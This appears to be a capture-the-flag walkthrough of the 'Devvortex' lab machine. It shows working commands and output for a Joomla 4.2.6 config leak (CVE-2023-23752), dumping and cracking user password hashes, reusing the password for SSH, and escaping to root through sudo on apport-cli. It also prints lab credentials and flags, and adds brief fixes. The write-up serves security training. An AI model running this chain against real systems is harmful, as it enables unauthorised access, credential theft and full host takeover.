Devvortex
Recon
HTTP (80)



Joomla
CVE-2023-23752
RCE

Database Enumeration
SSH
User.txt
Privilege Escalation
└─$ domain='devvortex.htb'; ffuf -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fw 4
v2.1.0-dev
dev [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 120ms]
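:: Progress: [4989/4989] :: Job [1/1] :: 277 req/sec :: Duration: [0:00:10] :: Errors: 0 ::
[+] Detecting Joomla Version
[++] Joomla 4.2.6
The request below carries no credentials or session; on this Joomla 4.2.6 host the application-config API endpoint still returns the site's database settings (CVE-2023-23752). Every value in the response, including the database user and password, should be treated as disclosed and rotated once Joomla is updated.
└─$ curl http://dev.devvortex.htb/api/index.php/v1/config/application?public=true -s | jq .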
{
"links": {
"self": "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true",
"next": "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true&page%5Boffset%5D=20&page%5Blimit%5D=20",
"last": "http://dev.devvortex.htb/api/index.php/v1/config/application?public=true&page%5Boffset%5D=60&page%5Blimit%5D=20"
},
"data": [
{
"type": "application",
"id": "224",
"attributes": {
"offline": false,
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"offline_message": "This site is down for maintenance.<br>Please check back again soon.",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"display_offline_message": 1,
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"offline_image": "",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"sitename": "Development",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"editor": "tinymce",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"captcha": "0",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"list_limit": 20,
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"access": 1,
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"debug": false,
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"debug_lang": false,
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"debug_lang_const": true,
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"dbtype": "mysqli",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"host": "localhost",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"user": "lewis",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"password": "P4ntherg0t1n5r3c0n##",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"db": "joomla",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"dbprefix": "sd4fg_",
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"dbencryption": 0,
"id": 224
}
},
{
"type": "application",
"id": "224",
"attributes": {
"dbsslverifyservercert": false,
"id": 224
}
}
],
"meta": {
"total-pages": 4
}
}
www-data@devvortex:…/www/dev.devvortex.htb# cat configuration.php
<?php
class JConfig {
public $offline = false;
public $offline_message = 'This site is down for maintenance.<br>Please check back again soon.';
public $display_offline_message = 1;
public $offline_image = '';
public $sitename = 'Development';
public $editor = 'tinymce';
public $captcha = '0';
public $list_limit = 20;
public $access = 1;
public $debug = false;
public $debug_lang = false;
public $debug_lang_const = true;
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'lewis';
public $password = 'P4ntherg0t1n5r3c0n##';
public $db = 'joomla';
public $dbprefix = 'sd4fg_';
public $dbencryption = 0;
public $dbsslverifyservercert = false;
public $dbsslkey = '';
public $dbsslcert = '';
public $dbsslca = '';
public $dbsslcipher = '';
public $force_ssl = 0;
public $live_site = '';
public $secret = 'ZI7zLTbaGKliS9gq';
public $gzip = false;
public $error_reporting = 'default';
public $helpurl = 'https://help.joomla.org/proxy?keyref=Help{major}{minor}:{keyref}&lang={langcode}';
public $offset = 'UTC';
public $mailonline = true;
public $mailer = 'mail';
public $mailfrom = 'lewis@devvortex.htb';
public $fromname = 'Development';
public $sendmail = '/usr/sbin/sendmail';
public $smtpauth = false;
public $smtpuser = '';
public $smtppass = '';
public $smtphost = 'localhost';
public $smtpsecure = 'none';
public $smtpport = 25;
public $caching = 0;
public $cache_handler = 'file';
public $cachetime = 15;
public $cache_platformprefix = false;
public $MetaDesc = '';
public $MetaAuthor = true;
public $MetaVersion = false;
public $robots = '';
public $sef = true;
public $sef_rewrite = false;
public $sef_suffix = false;
public $unicodeslugs = false;
public $feed_limit = 10;
public $feed_email = 'none';
public $log_path = '/var/www/dev.devvortex.htb/administrator/logs';
public $tmp_path = '/var/www/dev.devvortex.htb/tmp';
public $lifetime = 15;
public $session_handler = 'database';
public $shared_session = false;
public $session_metadata = true;
}
www-data@devvortex:…/www/dev.devvortex.htb# mysql -u lewis -p'P4ntherg0t1n5r3c0n##' -e 'SHOW DATABASES;'
Database
information_schema
joomla
performance_schema
www-data@devvortex:…/www/dev.devvortex.htb# mysql -u lewis -p'P4ntherg0t1n5r3c0n##' joomla -e 'SHOW TABLES;'
Tables_in_joomla
...
sd4fg_user_keys
sd4fg_user_mfa
sd4fg_user_notes
sd4fg_user_profiles
sd4fg_user_usergroup_map
sd4fg_usergroups
sd4fg_users
...
www-data@devvortex:…/www/dev.devvortex.htb# mysql -u lewis -p'P4ntherg0t1n5r3c0n##' joomla -e 'SELECT username, password FROM sd4fg_users;'
username password
lewis $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u
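logan $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12
The hashes are bcrypt with cost 10 (1024 iterations, as john reports below). That cost slows guessing but does not protect a password that appears in a common wordlist, which is why the run finishes in 11 seconds.
➜ .\john-1.9.0-jumbo-1-win64\run\john.exe --wordlist=.\rockyou.txt .\hashes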
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tequieromucho (?)
1g 0:00:00:11 DONE (2024-11-24 16:34) 0.08750g/s 126.0p/s 126.0c/s 126.0C/s lacoste..michel
Use the "--show" option to display all of the cracked passwords reliably
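Session completed
The recovered password is then tried against the local account logan and accepted, so the Joomla password and the system password are the same; separate credentials for the CMS and the operating-system account would have stopped the chain here.
www-data@devvortex:…/www/dev.devvortex.htb# echo 'tequieromucho' | su - logan -c 'id'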
Password: uid=1000(logan) gid=1000(logan) groups=1000(logan)
└─$ ssh logan@devvortex.htb -i id_rsa
logan@devvortex:~$ cat user.txt
69399d0a3174a352c65bcab90c17a8e8
logan@devvortex:~$ sudo -l
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User logan may run the following commands on devvortex:
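(ALL : ALL) /usr/bin/apport-cli
This sudoers entry lets logan run apport-cli as root. Its "View report" option appears to hand the report to an interactive viewer that inherits root, which is where the root prompt at the end of this transcript comes from. Removing the rule, or updating apport and not granting sudo on interactive tools, closes the path.
logan@devvortex:~$ sleep 60 &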
[1] 2151
logan@devvortex:~$ kill -SIGSEGV 2151
logan@devvortex:~$ ls /var/crash/
_usr_bin_sleep.1000.crash
[1]+ Segmentation fault (core dumped) sleep 60
logan@devvortex:~$ sudo /usr/bin/apport-cli -c /var/crash/_usr_bin_sleep.1000.crash
*** Send problem report to the developers?
After the problem report has been sent, please fill out the form in the
automatically opened web browser.
What would you like to do? Your options are:
S: Send report (30.0 KB)
V: View report
K: Keep report file for sending later or copying to somewhere else
I: Cancel and ignore future crashes of this program version
C: Cancel
Please choose (S/V/K/I/C): V
*** Collecting problem information
The collected information can be sent to the developers to improve the
application. This might take a few minutes.
........................................................................................................................................................................................................................................................................................................................................................................<snip>
......................................................................ERROR: Cannot update /var/crash/_usr_bin_sleep.1000.crash: [Errno 13] Permission denied: '/var/crash/_usr_bin_sleep.1000.crash'
........!./b.in./ba.sh
root@devvortex:/home/logan# id
uid=0(root) gid=0(root) groups=0(root)
root@devvortex:~# cat root.txt
1c4cce162d7ff2b42bc2241bdfc4d691